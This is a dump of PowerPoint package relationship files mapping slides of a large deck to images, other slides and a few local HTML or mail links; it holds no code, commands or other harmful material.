<file path=ppt/slides/_rels/slide18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8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92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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88.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3.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.jpeg"/><Relationship Id="rId16"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5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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194.jpe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12.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.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19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19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9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19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image" Target="../media/image222.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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_rels/slide19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9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2.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slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide250.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8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.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0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27.png"/><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203.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0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20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20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30.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image229.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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32.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image231.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide205.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide323.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide166.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide198.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide265.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87.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide183.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide177.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide82.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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21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hyperlink" Target="../Content/ItCS/calendar.php-108.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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21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215.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21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217.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slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.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44.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/BGPlay-master/run_bgplay.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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1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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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0.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image252.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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22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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image256.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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22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59.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image258.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide226.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59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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62.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide228.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229.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slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image266.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0.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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0.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide232.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274.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide233.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274.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide234.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274.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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5.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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6.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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7.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide238.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274.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide239.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274.png"/><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73.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpe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24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80.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image279.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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81.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide244.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82.jpeg"/><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245.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283.jpeg"/><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24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24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288.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image287.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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24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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide45.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide40.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide250.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide406.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide251.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slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide251.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide250.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380.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide265.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide294.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide263.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide288.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide251.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide261.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide281.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide258.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide311.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide274.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide256.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide269.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide304.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide253.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slide" Target="slide252.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25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5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292.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide256.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57.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slide" Target="slide252.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258.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59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.pn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297.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image296.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image295.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428.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300.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image299.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide261.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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image301.pn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png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide263.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4.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307.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image306.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide265.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6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image" Target="../media/image309.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image308.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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image" Target="../media/image311.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide269.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428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30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316.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15.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image313.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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image" Target="../media/image318.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image317.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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319.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image322.pn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76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image326.pn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s>
</file>

<file path=ppt/slides/_rels/slide277.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330.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image333.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32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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79.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335.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.gif"/><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38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.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428.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slide" Target="slide252.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281.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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.pn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283.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345.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image349.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48.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image346.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide284.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351.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide285.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image356.gif"/><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55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide287.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.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288.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89.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359.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image363.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62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image361.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.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290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.bmp"/><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67.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide291.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369.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide292.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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372.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image371.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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5.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375.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image374.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide296.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79.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image377.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.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381.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide298.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384.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image383.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide299.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image385.bmp"/><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387.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.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428.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428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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02.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image388.bmp"/><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390.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide303.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image391.pn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94.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide304.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05.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image395.bmp"/><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398.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide306.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image399.bmp"/><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400.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.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slide" Target="slide252.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308.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slide" Target="slide252.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403.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide309.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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395.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image407.bmp"/><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406.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image404.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide311.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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image412.bmp"/><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411.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide313.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414.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image418.bmp"/><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417.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image416.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image415.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide314.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image423.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422.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide316.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427.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image426.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide317.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slide" Target="slide428.xml"/><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18.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hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image431.bmp"/><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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image428.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide319.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
